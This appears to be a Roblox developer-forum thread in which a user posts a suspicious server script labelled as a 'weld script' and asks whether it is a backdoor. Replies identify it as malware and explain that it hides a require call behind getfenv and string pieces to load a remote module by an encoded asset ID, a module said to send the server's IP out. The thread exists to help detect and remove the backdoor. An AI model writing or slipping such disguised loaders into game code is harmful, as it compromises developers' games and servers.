I just found a server script looked suspicious and used “getfenv” so I think its was a backdoor virus. Apparently its supposed to be a WELD. script for my baseplate, but I don’t trust it.
So tell me scripting experts:
Is this a backdoor virus script?
--weld script writen by atrition
pcall(function()
local fenv = getfenv
local ADDR = 0x19F996F0A;
local INST = "re"
pcall(fenv()[INST.."qui"..INST](ADDR))
end)
If it were a ‘weld script’, the developer would write it and would not encrypt it using variables (and it would be possible to write a script), and it’s somehow very strange that instead of the ID for the request there is a different number. If there was an ID there, you could check this asset and if it has no ratings or it is poorly rated and the comments are bad, it would be a virus, I’m not very good at scripting, but that’s what I think.
Looking at the source code of the module this script loads, for whatever reason it’s sending the server the script is running on’s IP address to some website.
You all REALLY saved me. Who knows how long I’ve had that script in my experience.
I’ve removed all the backdoors from the experience.
I also looked at some tutorials on the DevForum to search for others, just in case and I found another, which I also removed.